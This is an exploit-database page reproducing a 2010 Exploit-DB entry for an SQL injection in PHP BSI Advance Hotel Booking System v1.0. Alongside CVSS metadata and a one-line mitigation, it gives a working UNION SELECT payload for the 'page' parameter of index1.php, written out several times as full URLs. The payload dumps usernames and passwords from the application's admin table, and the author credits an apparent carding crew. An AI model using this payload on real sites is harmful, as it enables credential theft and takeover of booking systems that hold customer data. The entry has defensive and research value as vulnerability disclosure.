PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability

vendor:

PHP BSI Advance Hotel Booking System

by:

v3n0m

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP BSI Advance Hotel Booking System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:bestsoftinc:php_bsi_advance_hotel_booking_system:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable URL parameter. For example, http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------
PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: November, 14-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
Application	: PHP BSI Advance Hotel Booking System
Version		: 1.0
Vendor  	: http://www.bestsoftinc.com/

Exploit & p0c
_____________

-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

http://127.0.0.1/[path]/index1.php?page=[SQLi]
http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

ShoutZ
______

All YOGYACARDERLINK CREW, GheMaX, LeQhi
Also Jovita & Fabian :)